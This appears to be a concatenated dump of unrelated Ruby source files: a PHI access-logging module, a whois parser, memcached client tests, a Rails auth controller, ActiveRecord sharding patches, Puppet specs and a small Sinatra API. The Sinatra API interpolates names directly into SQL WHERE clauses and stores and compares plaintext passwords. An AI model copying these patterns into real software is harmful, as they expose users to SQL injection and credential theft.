# @example
# Foo::phi_wrap_method(:bar)
#
# foo = Foo.find(1)
# foo.bar # => raises PHI Access Exception
#
# foo.allow_phi!('[email protected]', 'testing')
#
# foo.bar # => returns original value of Foo#bar
#
# # defines two new methods:
# # __bar_phi_wrapped
# # __bar_phi_unwrapped
# #
# # After these methods are defined
# # an alias chain is created that
# # roughly maps:
# #
# # bar => __bar_phi_wrapped => __bar_phi_unwrapped
# #
# # This ensures that all calls to Foo#bar pass
# # through access logging.
#
def phi_wrap_method(method_name)
return if self.class.__phi_methods_wrapped.include? method_name
wrapped_method = :"__#{method_name}_phi_wrapped"
unwrapped_method = :"__#{method_name}_phi_unwrapped"
self.class.send(:define_method, wrapped_method) do |*args, &block|
PhiAttrs::Logger.tagged(*phi_log_keys) do
raise PhiAttrs::Exceptions::PhiAccessException, "Attempted PHI access for #{self.class.name} #{@__phi_user_id}" unless phi_allowed?
unless all_phi_context_logged?
PhiAttrs::Logger.info("#{self.class.name} access by [#{all_phi_allowed_by}]. Triggered by method: #{method_name}")
set_all_phi_context_logged
end
send(unwrapped_method, *args, &block)
end
end
# method_name => wrapped_method => unwrapped_method
self.class.send(:alias_method, unwrapped_method, method_name)
self.class.send(:alias_method, method_name, wrapped_method)
self.class.__phi_methods_wrapped << method_name
end
# Core logic for wrapping methods in PHI access extensions. Almost
# functionally equivalent to the phi_wrap_method call above,
# this method doesn't add any logging or access restriction, but
# simply proxies the PhiRecord#allow_phi! call.
#
# @private
#
def phi_wrap_extension(method_name)
return if self.class.__phi_methods_to_extend.include? method_name
wrapped_method = wrapped_extended_name(method_name)
unwrapped_method = unwrapped_extended_name(method_name)
self.class.send(:define_method, wrapped_method) do |*args, &block|
relation = send(unwrapped_method, *args, &block)
if phi_allowed?
if relation.present? && relation_klass(relation).included_modules.include?(PhiRecord)
relations = relation.is_a?(Enumerable) ? relation : [relation]
relations.each do |r|
r.allow_phi!(phi_allowed_by, phi_access_reason) unless @__phi_relations_extended.include?(r)
end
@__phi_relations_extended.merge(relations)
self.class.__instances_with_extended_phi.add(self)
end
end
relation
end
# method_name => wrapped_method => unwrapped_method
self.class.send(:alias_method, unwrapped_method, method_name)
self.class.send(:alias_method, method_name, wrapped_method)
self.class.__phi_methods_to_extend << method_name
end
# Revoke PHI access for all `extend`ed relations (or only those given)
def revoke_extended_phi!(relations = nil)
relations ||= @__phi_relations_extended
relations.each do |relation|
relation.disallow_last_phi! if relation.present? && relation_klass(relation).included_modules.include?(PhiRecord)
end
@__phi_relations_extended.subtract(relations)
end
# Adds a disallow PHI access to the stack for block syntax for all `extend`ed relations (or only those given)
def add_disallow_flag_to_extended_phi!(relations = nil)
relations ||= @__phi_relations_extended
relations.each do |relation|
relation.add_disallow_flag! if relation.present? && relation_klass(relation).included_modules.include?(PhiRecord)
end
end
# Adds a disallow PHI access to the stack for all for all `extend`ed relations (or only those given)
def remove_disallow_flag_from_extended_phi!(relations = nil)
relations ||= @__phi_relations_extended
relations.each do |relation|
relation.remove_disallow_flag! if relation.present? && relation_klass(relation).included_modules.include?(PhiRecord)
end
end
def relation_klass(rel)
return rel.klass if rel.is_a?(ActiveRecord::Relation)
return rel.first.class if rel.is_a?(Enumerable)
return rel.class
end
def wrapped_extended_name(method_name)
:"__#{method_name}_phi_access_extended"
end
def unwrapped_extended_name(method_name)
:"__#{method_name}_phi_access_original"
end
end
end
| 34.372442 | 160 | 0.646557 |
7a6c5f422f597cf8a2e2c9652ccc6f0bb0f526ee | 184 | class AddCachedVotesColumnToSite < ActiveRecord::Migration
def change
add_column :sites, :cached_votes_up, :integer, default: 0
add_index :sites, :cached_votes_up
end
end
| 26.285714 | 61 | 0.766304 |
1a5bcf6426d712e69f746f81b33b9bb56be9016d | 2,044 | #
# = Ruby Whois
#
# An intelligent pure Ruby WHOIS client and parser.
#
#
# Category:: Net
# Package:: Whois
# Author:: Simone Carletti <[email protected]>
# License:: MIT License
#
#--
#
#++
require 'whois/answer/parser/base'
module Whois
class Answer
class Parser
#
# = whois.nic.mx parser
#
# Parser for the whois.nic.mx server.
#
# NOTE: This parser is just a stub and provides only a few basic methods
# to check for domain availability and get domain status.
# Please consider to contribute implementing missing methods.
# See WhoisNicIt parser for an explanation of all available methods
# and examples.
#
class WhoisNicMx < Base
property_supported :status do
@status ||= if available?
:available
else
:registered
end
end
property_supported :available? do
@available ||= !!(content_for_scanner =~ /Object_Not_Found/)
end
property_supported :registered? do
!available?
end
property_supported :created_on do
@created_on ||= if content_for_scanner =~ /Created On:\s+(.*)\n/
Time.parse($1)
end
end
# FIXME: the response contains localized data
# Expiration Date: 10-may-2011
# Last Updated On: 15-abr-2010 <--
# property_supported :updated_on do
# @updated_on ||= if content_for_scanner =~ /Last Updated On:\s+(.*)\n/
# Time.parse($1)
# end
# end
property_supported :expires_on do
@expires_on ||= if content_for_scanner =~ /Expiration Date:\s+(.*)\n/
Time.parse($1)
end
end
property_supported :nameservers do
@nameservers ||= if content_for_scanner =~ /Name Servers:\n((.+\n)+)\n/
$1.scan(/DNS:\s+(.*)\n/).flatten.map(&:strip)
else
[]
end
end
end
end
end
end
| 23.227273 | 81 | 0.557241 |
ab21084733c6ce746cbc6b5f7e0f3581febab5b5 | 20,892 | # frozen_string_literal: true
require_relative "helper"
require "openssl"
require "securerandom"
describe "Dalli" do
describe "options parsing" do
it "handle deprecated options" do
dc = Dalli::Client.new("foo", compression: true)
assert dc.instance_variable_get(:@options)[:compress]
refute dc.instance_variable_get(:@options)[:compression]
end
it "not warn about valid options" do
dc = Dalli::Client.new("foo", compress: true)
# Rails.logger.expects :warn
assert dc.instance_variable_get(:@options)[:compress]
end
it "raises error with invalid expires_in" do
bad_data = [{bad: "expires in data"}, Hash, [1, 2, 3]]
bad_data.each do |bad|
assert_raises ArgumentError do
Dalli::Client.new("foo", {expires_in: bad})
end
end
end
it "return string type for namespace attribute" do
dc = Dalli::Client.new("foo", namespace: :wunderschoen)
assert_equal "wunderschoen", dc.send(:namespace)
dc.close
dc = Dalli::Client.new("foo", namespace: proc { :wunderschoen })
assert_equal "wunderschoen", dc.send(:namespace)
dc.close
end
it "raises error with invalid digest_class" do
assert_raises ArgumentError do
Dalli::Client.new("foo", {expires_in: 10, digest_class: Object})
end
end
it "opens a standard TCP connection" do
memcached_persistent do |dc|
server = dc.send(:ring).servers.first
sock = Dalli::Socket::TCP.open(server.hostname, server.port, server, server.options)
assert_equal Dalli::Socket::TCP, sock.class
dc.set("abc", 123)
assert_equal(123, dc.get("abc"))
end
end
it "opens a SSL TCP connection" do
memcached_ssl_persistent do |dc|
server = dc.send(:ring).servers.first
sock = Dalli::Socket::TCP.open(server.hostname, server.port, server, server.options)
assert_equal Dalli::Socket::SSLSocket, sock.class
dc.set("abc", 123)
assert_equal(123, dc.get("abc"))
end
end
end
describe "key validation" do
it "not allow blanks" do
memcached_persistent do |dc|
dc.set " ", 1
assert_equal 1, dc.get(" ")
dc.set "\t", 1
assert_equal 1, dc.get("\t")
dc.set "\n", 1
assert_equal 1, dc.get("\n")
assert_raises ArgumentError do
dc.set "", 1
end
assert_raises ArgumentError do
dc.set nil, 1
end
end
end
it "allow namespace to be a symbol" do
memcached_persistent do |_, port|
dc = Dalli::Client.new("localhost:#{port}", namespace: :wunderschoen)
dc.set "x" * 251, 1
assert 1, dc.get("#{"x" * 200}:md5:#{Digest::MD5.hexdigest("x" * 251)}")
end
end
end
describe "ttl validation" do
it "generated an ArgumentError for ttl that does not support to_i" do
memcached_persistent do |dc|
assert_raises ArgumentError do
dc.set("foo", "bar", [])
end
end
end
end
it "default to localhost:11211" do
dc = Dalli::Client.new
ring = dc.send(:ring)
s1 = ring.servers.first.hostname
assert_equal 1, ring.servers.size
dc.close
dc = Dalli::Client.new("localhost:11211")
ring = dc.send(:ring)
s2 = ring.servers.first.hostname
assert_equal 1, ring.servers.size
dc.close
dc = Dalli::Client.new(["localhost:11211"])
ring = dc.send(:ring)
s3 = ring.servers.first.hostname
assert_equal 1, ring.servers.size
dc.close
assert_equal "127.0.0.1", s1
assert_equal s2, s3
end
it "accept comma separated string" do
dc = Dalli::Client.new("server1.example.com:11211,server2.example.com:11211")
ring = dc.send(:ring)
assert_equal 2, ring.servers.size
s1, s2 = ring.servers.map(&:hostname)
assert_equal "server1.example.com", s1
assert_equal "server2.example.com", s2
end
it "accept array of servers" do
dc = Dalli::Client.new(["server1.example.com:11211", "server2.example.com:11211"])
ring = dc.send(:ring)
assert_equal 2, ring.servers.size
s1, s2 = ring.servers.map(&:hostname)
assert_equal "server1.example.com", s1
assert_equal "server2.example.com", s2
end
it "raises error when servers is a Hash" do
assert_raises ArgumentError do
Dalli::Client.new({hosts: "server1.example.com"})
end
end
describe "using a live server" do
it "support get/set" do
memcached_persistent do |dc|
dc.flush
val1 = "1234567890" * 999999
dc.set("a", val1)
val2 = dc.get("a")
assert_equal val1, val2
assert op_addset_succeeds(dc.set("a", nil))
assert_nil dc.get("a")
end
end
it "supports delete" do
memcached_persistent do |dc|
dc.set("some_key", "some_value")
assert_equal "some_value", dc.get("some_key")
dc.delete("some_key")
assert_nil dc.get("some_key")
end
end
it "returns nil for nonexist key" do
memcached_persistent do |dc|
assert_nil dc.get("notexist")
end
end
it 'allows "Not found" as value' do
memcached_persistent do |dc|
dc.set("key1", "Not found")
assert_equal "Not found", dc.get("key1")
end
end
it "support stats" do
memcached_persistent do |dc|
# make sure that get_hits would not equal 0
dc.set(:a, "1234567890" * 100000)
dc.get(:a)
stats = dc.stats
servers = stats.keys
assert(servers.any? { |s|
stats[s]["get_hits"].to_i != 0
}, "general stats failed")
stats_items = dc.stats(:items)
servers = stats_items.keys
assert(servers.all? { |s|
stats_items[s].keys.any? do |key|
key =~ /items:[0-9]+:number/
end
}, "stats items failed")
stats_slabs = dc.stats(:slabs)
servers = stats_slabs.keys
assert(servers.all? { |s|
stats_slabs[s].keys.any? do |key|
key == "active_slabs"
end
}, "stats slabs failed")
# reset_stats test
results = dc.reset_stats
assert(results.all? { |x| x })
stats = dc.stats
servers = stats.keys
# check if reset was performed
servers.each do |s|
assert_equal 0, dc.stats[s]["get_hits"].to_i
end
end
end
it "support the fetch operation" do
memcached_persistent do |dc|
dc.flush
expected = {"blah" => "blerg!"}
executed = false
value = dc.fetch("fetch_key") {
executed = true
expected
}
assert_equal expected, value
assert_equal true, executed
executed = false
value = dc.fetch("fetch_key") {
executed = true
expected
}
assert_equal expected, value
assert_equal false, executed
end
end
it "support the fetch operation with falsey values" do
memcached_persistent do |dc|
dc.flush
dc.set("fetch_key", false)
res = dc.fetch("fetch_key") { flunk "fetch block called" }
assert_equal false, res
end
end
it "support the fetch operation with nil values when cache_nils: true" do
memcached_persistent(21345, cache_nils: true) do |dc|
dc.flush
dc.set("fetch_key", nil)
res = dc.fetch("fetch_key") { flunk "fetch block called" }
assert_nil res
end
memcached_persistent(21345, cache_nils: false) do |dc|
dc.flush
dc.set("fetch_key", nil)
executed = false
res = dc.fetch("fetch_key") {
executed = true
"bar"
}
assert_equal "bar", res
assert_equal true, executed
end
end
it "support the cas operation" do
memcached_persistent do |dc|
dc.flush
expected = {"blah" => "blerg!"}
resp = dc.cas("cas_key") { |value|
fail("Value it not exist")
}
assert_nil resp
mutated = {"blah" => "foo!"}
dc.set("cas_key", expected)
resp = dc.cas("cas_key") { |value|
assert_equal expected, value
mutated
}
assert op_cas_succeeds(resp)
resp = dc.get("cas_key")
assert_equal mutated, resp
end
end
it "support the cas! operation" do
memcached_persistent do |dc|
dc.flush
mutated = {"blah" => "foo!"}
resp = dc.cas!("cas_key") { |value|
assert_nil value
mutated
}
assert op_cas_succeeds(resp)
resp = dc.get("cas_key")
assert_equal mutated, resp
end
end
it "support multi-get" do
memcached_persistent do |dc|
dc.close
dc.flush
resp = dc.get_multi(%w[a b c d e f])
assert_equal({}, resp)
dc.set("a", "foo")
dc.set("b", 123)
dc.set("c", %w[a b c])
# Invocation without block
resp = dc.get_multi(%w[a b c d e f])
expected_resp = {"a" => "foo", "b" => 123, "c" => %w[a b c]}
assert_equal(expected_resp, resp)
# Invocation with block
dc.get_multi(%w[a b c d e f]) do |k, v|
assert(expected_resp.has_key?(k) && expected_resp[k] == v)
expected_resp.delete(k)
end
assert expected_resp.empty?
# Perform a big multi-get with 1000 elements.
arr = []
dc.multi do
1000.times do |idx|
dc.set idx, idx
arr << idx
end
end
result = dc.get_multi(arr)
assert_equal(1000, result.size)
assert_equal(50, result["50"])
end
end
it "support raw incr/decr" do
memcached_persistent do |client|
client.flush
assert op_addset_succeeds(client.set("fakecounter", 0, 0, raw: true))
assert_equal 1, client.incr("fakecounter", 1)
assert_equal 2, client.incr("fakecounter", 1)
assert_equal 3, client.incr("fakecounter", 1)
assert_equal 1, client.decr("fakecounter", 2)
assert_equal "1", client.get("fakecounter", raw: true)
resp = client.incr("mycounter", 0)
assert_nil resp
resp = client.incr("mycounter", 1, 0, 2)
assert_equal 2, resp
resp = client.incr("mycounter", 1)
assert_equal 3, resp
resp = client.set("rawcounter", 10, 0, raw: true)
assert op_cas_succeeds(resp)
resp = client.get("rawcounter", raw: true)
assert_equal "10", resp
resp = client.incr("rawcounter", 1)
assert_equal 11, resp
end
end
it "support incr/decr operations" do
memcached_persistent do |dc|
dc.flush
resp = dc.decr("counter", 100, 5, 0)
assert_equal 0, resp
resp = dc.decr("counter", 10)
assert_equal 0, resp
resp = dc.incr("counter", 10)
assert_equal 10, resp
current = 10
100.times do |x|
resp = dc.incr("counter", 10)
assert_equal current + ((x + 1) * 10), resp
end
resp = dc.decr("10billion", 0, 5, 10)
# go over the 32-bit mark to verify proper (un)packing
resp = dc.incr("10billion", 10_000_000_000)
assert_equal 10_000_000_010, resp
resp = dc.decr("10billion", 1)
assert_equal 10_000_000_009, resp
resp = dc.decr("10billion", 0)
assert_equal 10_000_000_009, resp
resp = dc.incr("10billion", 0)
assert_equal 10_000_000_009, resp
assert_nil dc.incr("DNE", 10)
assert_nil dc.decr("DNE", 10)
resp = dc.incr("big", 100, 5, 0xFFFFFFFFFFFFFFFE)
assert_equal 0xFFFFFFFFFFFFFFFE, resp
resp = dc.incr("big", 1)
assert_equal 0xFFFFFFFFFFFFFFFF, resp
# rollover the 64-bit value, we'll get something undefined.
resp = dc.incr("big", 1)
refute_equal 0x10000000000000000, resp
dc.reset
end
end
it "support the append and prepend operations" do
memcached_persistent do |dc|
dc.flush
assert op_addset_succeeds(dc.set("456", "xyz", 0, raw: true))
assert_equal true, dc.prepend("456", "0")
assert_equal true, dc.append("456", "9")
assert_equal "0xyz9", dc.get("456", raw: true)
assert_equal "0xyz9", dc.get("456")
assert_equal false, dc.append("nonexist", "abc")
assert_equal false, dc.prepend("nonexist", "abc")
end
end
it "supports replace operation" do
memcached_persistent do |dc|
dc.flush
dc.set("key", "value")
assert op_replace_succeeds(dc.replace("key", "value2"))
assert_equal "value2", dc.get("key")
end
end
it "support touch operation" do
memcached_persistent do |dc|
dc.flush
dc.set "key", "value"
assert_equal true, dc.touch("key", 10)
assert_equal true, dc.touch("key")
assert_equal "value", dc.get("key")
assert_nil dc.touch("notexist")
rescue Dalli::DalliError => e
# This will happen when memcached is in lesser version than 1.4.8
assert_equal "Response error 129: Unknown command", e.message
end
end
it "support gat operation" do
memcached_persistent do |dc|
dc.flush
dc.set "key", "value"
assert_equal "value", dc.gat("key", 10)
assert_equal "value", dc.gat("key")
assert_nil dc.gat("notexist", 10)
rescue Dalli::DalliError => e
# This will happen when memcached is in lesser version than 1.4.8
assert_equal "Response error 129: Unknown command", e.message
end
end
it "support version operation" do
memcached_persistent do |dc|
v = dc.version
servers = v.keys
assert(servers.any? { |s|
!v[s].nil?
}, "version failed")
end
end
it "allow TCP connections to be configured for keepalive" do
memcached_persistent do |_, port|
dc = Dalli::Client.new("localhost:#{port}", keepalive: true)
dc.set(:a, 1)
ring = dc.send(:ring)
server = ring.servers.first
socket = server.instance_variable_get("@sock")
optval = socket.getsockopt(Socket::SOL_SOCKET, Socket::SO_KEEPALIVE)
optval = optval.unpack "i"
assert_equal true, (optval[0] != 0)
end
end
it "pass a simple smoke test" do
memcached_persistent do |dc, port|
resp = dc.flush
refute_nil resp
assert_equal [true, true], resp
assert op_addset_succeeds(dc.set(:foo, "bar"))
assert_equal "bar", dc.get(:foo)
resp = dc.get("123")
assert_nil resp
assert op_addset_succeeds(dc.set("123", "xyz"))
resp = dc.get("123")
assert_equal "xyz", resp
assert op_addset_succeeds(dc.set("123", "abc"))
dc.prepend("123", "0")
dc.append("123", "0")
assert_raises Dalli::UnmarshalError do
resp = dc.get("123")
end
dc.close
dc = nil
dc = Dalli::Client.new("localhost:#{port}", digest_class: ::OpenSSL::Digest::SHA1)
assert op_addset_succeeds(dc.set("456", "xyz", 0, raw: true))
resp = dc.prepend "456", "0"
assert_equal true, resp
resp = dc.append "456", "9"
assert_equal true, resp
resp = dc.get("456", raw: true)
assert_equal "0xyz9", resp
assert op_addset_succeeds(dc.set("456", false))
resp = dc.get("456")
assert_equal false, resp
resp = dc.stats
assert_equal Hash, resp.class
dc.close
end
end
it "pass a simple smoke test on unix socket" do
memcached_persistent(MemcachedMock::UNIX_SOCKET_PATH) do |dc, path|
resp = dc.flush
refute_nil resp
assert_equal [true], resp
assert op_addset_succeeds(dc.set(:foo, "bar"))
assert_equal "bar", dc.get(:foo)
resp = dc.get("123")
assert_nil resp
assert op_addset_succeeds(dc.set("123", "xyz"))
resp = dc.get("123")
assert_equal "xyz", resp
assert op_addset_succeeds(dc.set("123", "abc"))
dc.prepend("123", "0")
dc.append("123", "0")
assert_raises Dalli::UnmarshalError do
resp = dc.get("123")
end
dc.close
dc = nil
dc = Dalli::Client.new(path)
assert op_addset_succeeds(dc.set("456", "xyz", 0, raw: true))
resp = dc.prepend "456", "0"
assert_equal true, resp
resp = dc.append "456", "9"
assert_equal true, resp
resp = dc.get("456", raw: true)
assert_equal "0xyz9", resp
assert op_addset_succeeds(dc.set("456", false))
resp = dc.get("456")
assert_equal false, resp
resp = dc.stats
assert_equal Hash, resp.class
dc.close
end
end
it "support multithreaded access" do
memcached_persistent do |cache|
cache.flush
workers = []
cache.set("f", "zzz")
assert op_cas_succeeds((cache.cas("f") { |value|
value << "z"
}))
assert_equal "zzzz", cache.get("f")
# Have a bunch of threads perform a bunch of operations at the same time.
# Verify the result of each operation to ensure the request and response
# are not intermingled between threads.
10.times do
workers << Thread.new {
100.times do
cache.set("a", 9)
cache.set("b", 11)
cache.incr("cat", 10, 0, 10)
cache.set("f", "zzz")
res = cache.cas("f") { |value|
value << "z"
}
refute_nil res
assert_equal false, cache.add("a", 11)
assert_equal({"a" => 9, "b" => 11}, cache.get_multi(["a", "b"]))
inc = cache.incr("cat", 10)
assert_equal 0, inc % 5
cache.decr("cat", 5)
assert_equal 11, cache.get("b")
assert_equal %w[a b], cache.get_multi("a", "b", "c").keys.sort
end
}
end
workers.each { |w| w.join }
cache.flush
end
end
it "handle namespaced keys" do
memcached_persistent do |_, port|
dc = Dalli::Client.new("localhost:#{port}", namespace: "a")
dc.set("namespaced", 1)
dc2 = Dalli::Client.new("localhost:#{port}", namespace: "b")
dc2.set("namespaced", 2)
assert_equal 1, dc.get("namespaced")
assert_equal 2, dc2.get("namespaced")
end
end
it "handle nil namespace" do
memcached_persistent do |_, port|
dc = Dalli::Client.new("localhost:#{port}", namespace: nil)
assert_equal "key", dc.send(:validate_key, "key")
end
end
it "truncate cache keys that are too long" do
memcached_persistent do |_, port|
dc = Dalli::Client.new("localhost:#{port}", namespace: "some:namspace")
key = "this cache key is far too long so it must be hashed and truncated and stuff" * 10
value = "some value"
assert op_addset_succeeds(dc.set(key, value))
assert_equal value, dc.get(key)
end
end
it "handle namespaced keys in multi_get" do
memcached_persistent do |_, port|
dc = Dalli::Client.new("localhost:#{port}", namespace: "a")
dc.set("a", 1)
dc.set("b", 2)
assert_equal({"a" => 1, "b" => 2}, dc.get_multi("a", "b"))
end
end
it "handle special Regexp characters in namespace with get_multi" do
memcached_persistent do |_, port|
# /(?!)/ is a contradictory PCRE and should never be able to match
dc = Dalli::Client.new("localhost:#{port}", namespace: "(?!)")
dc.set("a", 1)
dc.set("b", 2)
assert_equal({"a" => 1, "b" => 2}, dc.get_multi("a", "b"))
end
end
it "handle application marshalling issues" do
memcached_persistent do |dc|
with_nil_logger do
assert_raises Dalli::MarshalError do
dc.set("a", proc { true })
end
end
end
end
describe "with compression" do
it "does not allow large values" do
memcached_persistent do |dc|
value = SecureRandom.random_bytes(1024 * 1024 + 30_000)
with_nil_logger do
assert_raises Dalli::ValueOverMaxSize do
dc.set("verylarge", value)
end
end
end
end
it "allow large values to be set" do
memcached_persistent do |dc|
value = "0" * 1024 * 1024
assert dc.set("verylarge", value, nil, compress: true)
end
end
end
end
end
| 27.967871 | 96 | 0.572564 |
bf28f3bd677144ef250dfa02e89cd427b093447c | 1,421 | require_relative 'modules/dbhandler'
class App < Sinatra::Base
register Sinatra::Reloader
get '/test' do
File.read(File.join('public', 'testing.html'))
end
post '/test' do
redirect '/test'
end
get '/api/users' do
DBhandler.get("users", "name")
end
post '/api/create-user' do
# for testing purposes
inputname = "test"
inputpwd = "go"
if DBhandler.get("users","name", "WHERE name = '#{inputname}'").length < 1
DBhandler.insert("users", "'name', 'password'", [inputname, inputpwd])
# TODO revise returned response
return 200
else
#TODO create proper error message
return 400
end
end
post '/api/login' do
#for testing purposes
inputname = "test"
inputpwd = "go"
user = DBhandler.get("users","name, password", "WHERE name = '#{inputname}'")
if user.length == 1 && user.first["password"] == inputpwd
# TODO revise returned response
return 200
else
#TODO create proper error message
return 400
end
end
get '/api/posts' do
DBhandler.get("posts", "*")
end
get '/api/comments' do
DBhandler.get("comments", "*")
end
get '/api/roles' do
DBhandler.get("roles", "*")
end
end | 17.54321 | 85 | 0.530612 |
91e07edfb6634143713fd7277e8360e25efe7ff0 | 1,731 | module WebMock
class RequestExecutionVerifier
attr_accessor :request_pattern, :expected_times_executed, :times_executed
def initialize(request_pattern = nil, expected_times_executed = nil)
@request_pattern = request_pattern
@expected_times_executed = expected_times_executed
end
def matches?
@times_executed =
RequestRegistry.instance.times_executed(@request_pattern)
@times_executed == (@expected_times_executed || 1)
end
def does_not_match?
@times_executed =
RequestRegistry.instance.times_executed(@request_pattern)
if @expected_times_executed
@times_executed != @expected_times_executed
else
@times_executed == 0
end
end
def failure_message
expected_times_executed = @expected_times_executed || 1
text = %Q(The request #{request_pattern.to_s} was expected to execute #{times(expected_times_executed)} but it executed #{times(times_executed)})
text << self.class.executed_requests_message
text
end
def failure_message_when_negated
text = if @expected_times_executed
%Q(The request #{request_pattern.to_s} was not expected to execute #{times(expected_times_executed)} but it executed #{times(times_executed)})
else
%Q(The request #{request_pattern.to_s} was expected to execute 0 times but it executed #{times(times_executed)})
end
text << self.class.executed_requests_message
text
end
def self.executed_requests_message
"\n\nThe following requests were made:\n\n#{RequestRegistry.instance.to_s}\n" + "="*60
end
private
def times(times)
"#{times} time#{ (times == 1) ? '' : 's'}"
end
end
end
| 30.368421 | 151 | 0.69844 |
5d404e32c4b74f557a69950efd8efa6e03af5312 | 500 |
require 'etc'
module Enkaironment
module EtcMethods
# test if system user exists
# @param username [String|Integer] the UID or login name of a user
# @return [Boolean]
def user_exists?(username)
# @see https://github.com/rubocop-hq/rubocop/issues/3344
# rubocop:disable Style/DoubleNegation
!!Etc.send((username.is_a?(Numeric) ? :getpwuid : :getpwnam), username)
# rubocop:enable Style/DoubleNegation
rescue ArgumentError
false
end
end
end
| 26.315789 | 77 | 0.684 |
bb1d2db54ddfaf9e772a7f75ebbdc883774b1e96 | 924 | class Clearance::SessionsController < ApplicationController
skip_before_filter :authorize, :only => [:create, :new, :destroy]
protect_from_forgery :except => :create
def create
@user = authenticate(params)
if @user.nil?
flash_failure_after_create
render :template => 'sessions/new', :status => :unauthorized
else
sign_in @user
redirect_back_or url_after_create
end
end
def destroy
sign_out
redirect_to url_after_destroy
end
def new
render :template => 'sessions/new'
end
private
def flash_failure_after_create
flash.now[:notice] = translate(:bad_email_or_password,
:scope => [:clearance, :controllers, :sessions],
:default => t('flashes.failure_after_create', :sign_up_path => sign_up_path).html_safe)
end
def url_after_create
Clearance.configuration.redirect_url
end
def url_after_destroy
sign_in_url
end
end
| 22 | 93 | 0.707792 |
f86965419f21fddb7426df3ed1ff4ae7fb09c3de | 4,275 | module Switchman
module ActiveRecord
module Relation
def self.prepended(klass)
klass::SINGLE_VALUE_METHODS.concat [ :shard, :shard_source ]
end
def initialize(*args)
super
self.shard_value = Shard.current(klass ? klass.shard_category : :primary) unless shard_value
self.shard_source_value = :implicit unless shard_source_value
end
def clone
result = super
result.shard_value = Shard.current(klass ? klass.shard_category : :primary) unless shard_value
result
end
def merge(*args)
relation = super
if relation.shard_value != self.shard_value && relation.shard_source_value == :implicit
relation.shard_value = self.shard_value
relation.shard_source_value = self.shard_source_value
end
relation
end
def new(*args, &block)
primary_shard.activate(klass.shard_category) { super }
end
def create(*args, &block)
primary_shard.activate(klass.shard_category) { super }
end
def create!(*args, &block)
primary_shard.activate(klass.shard_category) { super }
end
def to_sql
primary_shard.activate(klass.shard_category) { super }
end
def explain
self.activate { |relation| relation.call_super(:explain, Relation) }
end
def records
return @records if loaded?
results = self.activate { |relation| relation.call_super(:records, Relation) }
case shard_value
when Array, ::ActiveRecord::Relation, ::ActiveRecord::Base
@records = results
@loaded = true
end
results
end
%I{update_all delete_all}.each do |method|
class_eval <<-RUBY, __FILE__, __LINE__ + 1
def #{method}(*args)
result = self.activate { |relation| relation.call_super(#{method.inspect}, Relation, *args) }
result = result.sum if result.is_a?(Array)
result
end
RUBY
end
def find_ids_in_ranges(options = {})
is_integer = columns_hash[primary_key.to_s].type == :integer
loose_mode = options[:loose] && is_integer
# loose_mode: if we don't care about getting exactly batch_size ids in between
# don't get the max - just get the min and add batch_size so we get that many _at most_
values = loose_mode ? "MIN(id)" : "MIN(id), MAX(id)"
batch_size = options[:batch_size].try(:to_i) || 1000
quoted_primary_key = "#{klass.connection.quote_local_table_name(table_name)}.#{klass.connection.quote_column_name(primary_key)}"
as_id = " AS id" unless primary_key == 'id'
subquery_scope = except(:select).select("#{quoted_primary_key}#{as_id}").reorder(primary_key.to_sym).limit(loose_mode ? 1 : batch_size)
subquery_scope = subquery_scope.where("#{quoted_primary_key} <= ?", options[:end_at]) if options[:end_at]
first_subquery_scope = options[:start_at] ? subquery_scope.where("#{quoted_primary_key} >= ?", options[:start_at]) : subquery_scope
ids = connection.select_rows("SELECT #{values} FROM (#{first_subquery_scope.to_sql}) AS subquery").first
while ids.first.present?
ids.map!(&:to_i) if is_integer
ids << ids.first + batch_size if loose_mode
yield(*ids)
last_value = ids.last
next_subquery_scope = subquery_scope.where(["#{quoted_primary_key}>?", last_value])
ids = connection.select_rows("SELECT #{values} FROM (#{next_subquery_scope.to_sql}) AS subquery").first
end
end
def activate(&block)
shards = all_shards
if (Array === shards && shards.length == 1)
if shards.first == DefaultShard || shards.first == Shard.current(klass.shard_category)
yield(self, shards.first)
else
shards.first.activate(klass.shard_category) { yield(self, shards.first) }
end
else
# TODO: implement local limit to avoid querying extra shards
Shard.with_each_shard(shards, [klass.shard_category]) do
shard(Shard.current(klass.shard_category), :to_a).activate(&block)
end
end
end
end
end
end
| 36.853448 | 143 | 0.633684 |
1160defd51faef8457d0a938662dbfd635b71042 | 218 | # Copyright (c) Universidade Federal Fluminense (UFF).
# This file is part of SAPOS. Please, consult the license terms in the LICENSE file.
ActiveModel::Type.register(:text, ActiveRecord::Type::Text, override: false)
| 43.6 | 84 | 0.766055 |
f8223d2daba9fcd9e0ace7bc9cc243b73f0d5134 | 11,416 | require 'spec_helper'
describe 'python' do
on_supported_os.each do |os, facts|
next if os == 'gentoo-3-x86_64'
context "on #{os}" do
let :facts do
facts
end
context 'with defaults' do
it { is_expected.to compile.with_all_deps }
it { is_expected.to contain_class('python::install') }
it { is_expected.to contain_class('python::params') }
it { is_expected.to contain_class('python::config') }
it { is_expected.to contain_package('python') }
it { is_expected.to contain_package('pip') }
end
context 'without managing things' do
let :params do
{
manage_python_package: false,
manage_pip_package: false
}
end
it { is_expected.to compile.with_all_deps }
it { is_expected.not_to contain_package('python') }
it { is_expected.not_to contain_package('pip') }
end
case facts[:os]['family']
when 'Debian'
# tests were written for Debian 6
context 'on Debian OS' do
it { is_expected.to contain_class('python::install') }
# Base debian packages.
it { is_expected.to contain_package('python') }
it { is_expected.to contain_package('python-dev') }
it { is_expected.to contain_package('pip') }
describe 'with python::version' do
context 'python3.7' do
let(:params) { { version: 'python3.7' } }
it { is_expected.to compile.with_all_deps }
it { is_expected.to contain_package('pip').with_name('python3.7-pip') }
it { is_expected.to contain_package('python').with_name('python3.7') }
it { is_expected.to contain_package('python-dev').with_name('python3.7-dev') }
end
end
describe 'with python::dev' do
context 'true' do
let(:params) { { dev: 'present' } }
it { is_expected.to compile.with_all_deps }
it { is_expected.to contain_package('python-dev').with_ensure('present') }
end
context 'empty/default' do
it { is_expected.to compile.with_all_deps }
it { is_expected.to contain_package('python-dev').with_ensure('absent') }
end
end
describe 'without python::dev' do
context 'empty/default' do
it { is_expected.to contain_package('python-dev').with_ensure('absent') }
end
end
describe 'with python::python_pyvenvs' do
context 'with two pyenvs' do
let(:params) do
{
python_pyvenvs: {
'/opt/env1' => {
version: '3.8'
},
'/opt/env2' => {
version: '3.8'
}
}
}
end
it { is_expected.to compile }
it { is_expected.to contain_python__pyvenv('/opt/env1').with_ensure('present') }
it { is_expected.to contain_python__pyvenv('/opt/env2').with_ensure('present') }
it { is_expected.to contain_exec('python_virtualenv_/opt/env1') }
it { is_expected.to contain_exec('python_virtualenv_/opt/env2') }
